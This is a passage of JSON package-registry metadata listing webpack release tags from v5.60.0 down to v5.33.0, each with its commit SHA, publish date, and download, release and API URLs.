/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codelo